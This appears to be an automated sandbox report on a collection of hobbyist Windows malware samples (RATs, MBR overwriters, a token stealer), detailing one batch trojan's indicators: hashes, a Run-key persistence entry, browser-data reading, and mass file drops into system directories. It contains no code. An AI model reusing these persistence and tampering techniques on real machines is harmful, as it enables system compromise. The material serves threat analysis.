Overview: score 10
Static: score 5

Targets (platform windows10-2004-x64 for each):
My-Skidded...f2.exe
My-Skidded...Us.vbs  score 1
My-Skidded...AT.exe  score 10
My-Skidded...UN.exe  score 10
My-Skidded...no.exe  score 6
My-Skidded...MK.exe
My-Skidded...ck.vbs  score 1
My-Skidded...it.exe  score 7
My-Skidded... 2.bat  score 7
My-Skidded...OR.vbs  score 1
My-Skidded...ge.exe
My-Skidded...ck.exe  score 10
My-Skidded...BR.exe
My-Skidded...ba.vbs  score 1
My-Skidded...ad.exe
My-Skidded...BR.exe  score 6
My-Skidded...AL.exe  score 6
My-Skidded...en.exe  score 6
My-Skidded...in.exe  score 6
My-Skidded...BR.exe
My-Skidded...64.exe
My-Skidded...64.exe  score 10
My-Skidded...24.exe  score 10
My-Skidded....0.bat  score 7
My-Skidded...as.exe
My-Skidded...ll.bat
My-Skidded...ks.exe
My-Skidded...ua.exe
My-Skidded...kz.bat  score 8
My-Skidded...BR.exe  score 6
My-Skidded...UG.exe
My-Skidded...mi.exe  score 6

Resubmissions
09/03/2025, 01:58  250309-cdv29swybs  score 10
08/03/2025, 06:55  250308-hp35xatjt9  score 10
08/03/2025, 04:53  250308-fh1ebssky5  score 10

Analysis
max time kernel: 300s
max time network: 117s
platform: windows10-2004_x64
resource: win10v2004-20250217-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/03/2025, 01:58
Behavioral tasks (resource win10v2004-20250217-en for each)
behavioral1   My-Skidded-malwares-main/6abdd72e82088f5aab90dc9e02f2d9781cea1b3f1c84b3f16df4810956f68ef2.exe
behavioral2   My-Skidded-malwares-main/AmongUs.vbs
behavioral3   My-Skidded-malwares-main/AnaRAT.exe
behavioral4   My-Skidded-malwares-main/CRINGE-DO-NOT-RUN.exe
behavioral5   My-Skidded-malwares-main/Cirno.exe
behavioral6   My-Skidded-malwares-main/DAMK.exe
behavioral7   My-Skidded-malwares-main/Dell_Fuck.vbs
behavioral8   My-Skidded-malwares-main/Discord Expliot Kit.exe
behavioral9   My-Skidded-malwares-main/ERROR 2.bat
behavioral10  My-Skidded-malwares-main/ERROR.vbs
behavioral11  My-Skidded-malwares-main/Fello_s_Revenge.exe
behavioral12  My-Skidded-malwares-main/Fellos RAT-Pack.exe
behavioral13  My-Skidded-malwares-main/KonataMBR.exe
behavioral14  My-Skidded-malwares-main/KonoSuba.vbs
behavioral15  My-Skidded-malwares-main/MarisaFumoDownload.exe
behavioral16  My-Skidded-malwares-main/MarisaMBR.exe
behavioral17  My-Skidded-malwares-main/Marlon2210FACEREVEAL.exe
behavioral18  My-Skidded-malwares-main/Marlon2210KeyGen.exe
behavioral19  My-Skidded-malwares-main/Megumin.exe
behavioral20  My-Skidded-malwares-main/NazrinMBR.exe
behavioral21  My-Skidded-malwares-main/PCCooker2.0_x64.exe
behavioral22  My-Skidded-malwares-main/PCCooker_x64.exe
behavioral23  My-Skidded-malwares-main/PanKoza2.0 Discord Token Stealer 2024.exe
behavioral24  My-Skidded-malwares-main/RaM KilLEr 1.0.bat
behavioral25  My-Skidded-malwares-main/Rias.exe
behavioral26  My-Skidded-malwares-main/Run All.bat
behavioral27  My-Skidded-malwares-main/TouhouHacks.exe
behavioral28  My-Skidded-malwares-main/Trojan.Aqua.exe
behavioral29  My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
behavioral30  My-Skidded-malwares-main/UtsuhoMBR.exe
behavioral31  My-Skidded-malwares-main/VXUG.exe
behavioral32  My-Skidded-malwares-main/YuukaKazami.exe
General
Target: My-Skidded-malwares-main/Trojan.Bat.FortniteHackz.bat
Size: 34KB
MD5: ac04b6f6fa293c4b55c4c8b49372a9ec
SHA1: 9dfca519218c3c10203163454f1237916b0655cc
SHA256: 273f4b1732968174b95b549e1fec0b61181404b820a0d8f1b8dec9c32686bd92
SHA512: b560feee161c2300b3145026dd5faa0ca3b4edbcaa88a8d68854d26b0c1a6087370af5da707b2fb61c5ca0b363a5786f5e7eeba2ed1fe5ae863347f018889086
SSDEEP: 192:9TIqVppLuLpDq7QYfLGMV+jasHHLgLxLR44444444444444444M666666666666Q:9rVppLuLpDq7QYfLGMV+jasHHLgLxi
Malware Config
Signatures
Drops file in Drivers directory (4 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\System32\drivers\gmreadme.txt  cmd.exe
File created  C:\Windows\System32\drivers\gmreadme.txt  cmd.exe
File opened for modification  C:\Windows\SysWOW64\drivers\gmreadme.txt  cmd.exe
File created  C:\Windows\SysWOW64\drivers\gmreadme.txt  cmd.exe
Reads user/profile data of web browsers (3 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 1 IoC)
description  ioc  Process
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_7188_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\My-Skidded-malwares-main\\Trojan.Bat.FortniteHackz.bat"  reg.exe
Drops file in System32 directory (64 IoCs)
description  ioc  Process
File opened for modification  C:\Windows\SysWOW64\IME\IMEJP\APPLETS\IMJPCLST.XML  cmd.exe
File opened for modification  C:\Windows\System32\spool\tools\Microsoft Print To PDF\MPDW-pipelineconfig.xml  cmd.exe
File created  C:\Windows\System32\ByteCodeGenerator.exe  cmd.exe
File opened for modification  C:\Windows\System32\SettingSyncHost.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\wbem\WMIC.exe  cmd.exe
File created  C:\Windows\System32\Speech_OneCore\common\es-ES\tokens_TTS_es-ES.xml  cmd.exe
File opened for modification  C:\Windows\System32\EaseOfAccessDialog.exe  cmd.exe
File created  C:\Windows\System32\fsutil.exe  cmd.exe
File opened for modification  C:\Windows\System32\tpmvscmgrsvr.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\fontview.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\WinRTNetMUAHostServer.exe  cmd.exe
File opened for modification  C:\Windows\System32\Recovery\ReAgent.xml  cmd.exe
File opened for modification  C:\Windows\System32\chglogon.exe  cmd.exe
File created  C:\Windows\System32\fontview.exe  cmd.exe
File created  C:\Windows\System32\RdpSa.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\iscsicli.exe  cmd.exe
File created  C:\Windows\SysWOW64\perfmon.exe  cmd.exe
File created  C:\Windows\System32\DriverStore\FileRepository\prnms014.inf_amd64_faec3fc366f8e1fa\Amd64\MSMPS.xml  cmd.exe
File created  C:\Windows\System32\DriverStore\FileRepository\prnms007.inf_amd64_8bbf44975c626ac5\Amd64\MSPassthrough-pipelineconfig.xml  cmd.exe
File created  C:\Windows\SysWOW64\MailContactsCalendarSync\LiveDomainList.txt  cmd.exe
File created  C:\Windows\SysWOW64\SyncHost.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\SystemPropertiesProtection.exe  cmd.exe
File opened for modification  C:\Windows\System32\ByteCodeGenerator.exe  cmd.exe
File created  C:\Windows\System32\iscsicpl.exe  cmd.exe
File created  C:\Windows\System32\rekeywiz.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\bthudtask.exe  cmd.exe
File created  C:\Windows\SysWOW64\cipher.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\dccw.exe  cmd.exe
File created  C:\Windows\SysWOW64\setup16.exe  cmd.exe
File opened for modification  C:\Windows\System32\@VpnToastIcon.png  cmd.exe
File created  C:\Windows\System32\WindowsUpdateElevatedInstaller.exe  cmd.exe
File opened for modification  C:\Windows\System32\RemoteSystemToastIcon.png  cmd.exe
File opened for modification  C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_a7412a554c9bc1fd\MPDW_devmode_map.xml  cmd.exe
File opened for modification  C:\Windows\SysWOW64\F12\Timeline.cpu.xml  cmd.exe
File created  C:\Windows\SysWOW64\Speech_OneCore\Common\de-DE\Tokens_SR_de-DE-N.xml  cmd.exe
File created  C:\Windows\System32\DriverStore\FileRepository\prnms004.inf_amd64_c28ee88ec1bd4178\Amd64\unisharev4-pipelineconfig.xml  cmd.exe
File created  C:\Windows\System32\appidpolicyconverter.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\mmgaserver.exe  cmd.exe
File created  C:\Windows\SysWOW64\Netplwiz.exe  cmd.exe
File created  C:\Windows\System32\SecurityAndMaintenance_Alert.png  cmd.exe
File created  C:\Windows\System32\Speech_OneCore\common\es-ES\tokens_TTS_es-ES_helena.xml  cmd.exe
File created  C:\Windows\SysWOW64\icsxml\potscfg.xml  cmd.exe
File opened for modification  C:\Windows\System32\DriverStore\FileRepository\prnms011.inf_amd64_f83138380f5fb6ab\Amd64\MSAppMon-pipelineconfig.xml  cmd.exe
File created  C:\Windows\System32\cmdkey.exe  cmd.exe
File created  C:\Windows\System32\dllhost.exe  cmd.exe
File opened for modification  C:\Windows\System32\pnputil.exe  cmd.exe
File created  C:\Windows\System32\PresentationSettings.exe  cmd.exe
File created  C:\Windows\System32\tskill.exe  cmd.exe
File opened for modification  C:\Windows\System32\TSWbPrxy.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\help.exe  cmd.exe
File created  C:\Windows\SysWOW64\icsxml\pppcfg.xml  cmd.exe
File opened for modification  C:\Windows\System32\credwiz.exe  cmd.exe
File opened for modification  C:\Windows\System32\NetHost.exe  cmd.exe
File created  C:\Windows\System32\PinEnrollmentBroker.exe  cmd.exe
File opened for modification  C:\Windows\System32\pospaymentsworker.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\hdwwiz.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\timeout.exe  cmd.exe
File opened for modification  C:\Windows\System32\NdfEventView.xml  cmd.exe
File opened for modification  C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_0e2452f597790e95\Amd64\unishare-pipelineconfig.xml  cmd.exe
File opened for modification  C:\Windows\System32\finger.exe  cmd.exe
File opened for modification  C:\Windows\SysWOW64\@VpnToastIcon.png  cmd.exe
File created  C:\Windows\System32\DriverStore\FileRepository\prnms012.inf_amd64_707d3849370b9d23\Amd64\MSIPP.xml  cmd.exe
File opened for modification  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\default.help.txt  cmd.exe
File created  C:\Windows\System32\certreq.exe  cmd.exe
Drops file in Program Files directory (64 IoCs)
description  ioc  Process
File created  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreMedTile.scale-100.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-32_contrast-white.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-60_altform-unplated_contrast-black.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Videos\SmartSelect\Magic_Select_add_tool.mp4  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\node_modules\reactxp-experimental-navigation\NavigationExperimental\assets\[email protected]  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\subs-illustration.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-40_altform-unplated_contrast-black.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-40.png  cmd.exe
File opened for modification  C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\WideTile.scale-100.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-48_altform-unplated.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SplashScreen.scale-200.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\SmallTile.scale-150_contrast-white.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-150.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\CortanaApp.ProjectedApi.xml  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNotePageWideTile.scale-100.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24_altform-unplated.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-unplated_contrast-black.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-150.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailSmallTile.scale-150.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\sq-AL\View3d\3DViewerProductDescription-universal.xml  cmd.exe
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.scale-400.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-64.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-200_contrast-white.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\AppxManifest.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageWideTile.scale-200.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchStoreLogo.scale-200_contrast-white.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-white\MedTile.scale-100.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\Icons_Icon_PoP_sm.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-48_altform-unplated_contrast-black.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_contrast-black.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\CalculatorWideTile.contrast-white_scale-100.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-16_altform-lightunplated.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-200_contrast-black.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-64_altform-unplated.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorStoreLogo.contrast-black_scale-200.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.ScreenSketch_2019.904.1644.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-400.png  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-30_altform-unplated.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-200.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-80.png  cmd.exe
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch.scale-150.png  cmd.exe
File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\empty.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarBadge.scale-100.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\SmallTile.scale-200.png  cmd.exe
File created  C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\symbase.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml  cmd.exe
File opened for modification  C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-20.png  cmd.exe
File created  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-40.png  cmd.exe
File opened for modification  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL002.XML  cmd.exe
File created  C:\Program Files\Windows Media Player\Network Sharing\ConnectionManager.xml  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-36.png  cmd.exe
File created  C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml  cmd.exe
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-64_altform-unplated_contrast-white.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleLogo.scale-400_contrast-white.png cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..econsumer.resources_31bf3856ad364e35_10.0.19041.1_it-it_f8576122041e54e0\Report.System.Diagnostics.xml cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoftwindows-un..keddevkit.appxsetup_31bf3856ad364e35_10.0.19041.1_none_0ae9d97ab43d0e4a\AppxBlockMap.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_10.0.19041.1288_none_4b1349ab76b8812f\splwow64.exe cmd.exe File created C:\Windows\IME\IMEJP\Assets\JpnImeModeToast.png cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-d..scannerpreview-host_31bf3856ad364e35_10.0.19041.1_none_484e61e96e69ac70\StoreLogo.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-i..lineid-wamextension_31bf3856ad364e35_10.0.19041.1151_none_74dbc950b4727647\DefaultAccountTile.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\ScreenClipping\ScreenClipping\Assets\StoreLogo.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-tabletpc-softkeyboard_31bf3856ad364e35_10.0.19041.173_none_af877ec0b0472fde\symbase.xml cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.264_none_ba5e4a287945a683\UpgradeMatrix.xml cmd.exe File created C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\header\Images\badgeRunning.png cmd.exe File opened for modification 
C:\Windows\SystemApps\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\speech\080a\tokens_esMX.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.19041.1_de-de_1418e1a4e830cf09\Rules.System.NetDiagFramework.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-b..ment-windows-minwin_31bf3856ad364e35_10.0.19041.1266_none_c4b179e0b12fe4b9\f\winload.exe cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-disksnapshot_31bf3856ad364e35_10.0.19041.1_none_3640cf5b039ce2f0\DiskSnapshot.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-u..userpredictionmodel_31bf3856ad364e35_10.0.19041.1_none_42c9bed4b6bd2e16\17499b8d805e9480903b0df0326a3d231841049e.xml cmd.exe File opened for modification C:\Windows\WinSxS\amd64_openssh-common-components-onecore_31bf3856ad364e35_10.0.19041.964_none_9a882af90ea09cc3\ssh-agent.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\PPIRemovableStorageDevicesSquareTile44x44.scale-400.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\filepicker.png cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.19041.906_none_a6600355b5f69459\TextReply.scale-200.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\CellularToast.scale-125_contrast-white.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..rastructureconsumer_31bf3856ad364e35_10.0.19041.1_none_69cd9c22cfcf9358\Report.System.Performance.xml cmd.exe File created C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-32.png cmd.exe File created 
C:\Windows\WinSxS\amd64_microsoft-windows-dot3svc.resources_31bf3856ad364e35_10.0.19041.1_de-de_1418e1a4e830cf09\Rules.System.Wired.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.264_none_ba5e4a287945a683\UpgradeMatrix.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\ScreenClipping\Assets\Square44x44Logo.targetsize-24_altform-unplated.png cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..iondialog.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_5f1081b1c1cd1c92\f\AppxBlockMap.xml cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-printing-printtopdf_31bf3856ad364e35_10.0.19041.1_none_382102bfe5e97ed1\MPDW_devmode_map.xml cmd.exe File created C:\Windows\WinSxS\x86_wpf-winfxlist_31bf3856ad364e35_10.0.19041.1_none_9aaf4564d7092a18\WinFXList.xml cmd.exe File created C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\WiFiNetworkManagerToast.scale-400_contrast-black.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.contrast-white_scale-200.png cmd.exe File created C:\Windows\WinSxS\amd64_microsoftwindows-un..keddevkit.appxsetup_31bf3856ad364e35_10.0.19041.1023_none_c9d08284ca03f3d7\f\AppxBlockMap.xml cmd.exe File created C:\Windows\WinSxS\Backup\amd64_windows-defender-service_31bf3856ad364e35_10.0.19041.746_none_a39f6d9ab59bd8b7_thirdpartynotices.txt_086f3c50 cmd.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-msconfig-exe_31bf3856ad364e35_10.0.19041.1110_none_4f46693352ed3250\msconfig.exe cmd.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1_none_bf506ecc66a800df\poqexec.exe cmd.exe File opened for modification 
C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\Square44x44Logo.scale-100.png | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.targetsize-16_altform-unplated_contrast-black.png | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-editions-professional_31bf3856ad364e35_10.0.19041.1288_none_51444fcfcf940a66\ProfessionalWorkstationEdition.xml | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.19041.1266_none_d375b5361b806b32\WpcTok.exe | cmd.exe
File opened for modification | C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\TinyTile.scale-125.png | cmd.exe
File created | C:\Windows\WinSxS\amd64_microsoft-windows-s..s-datausagehandlers_31bf3856ad364e35_10.0.19041.153_none_dbdeec75cdd2a4d1\DataUsageLiveTileTask.exe | cmd.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\AppxBlockMap.xml | cmd.exe
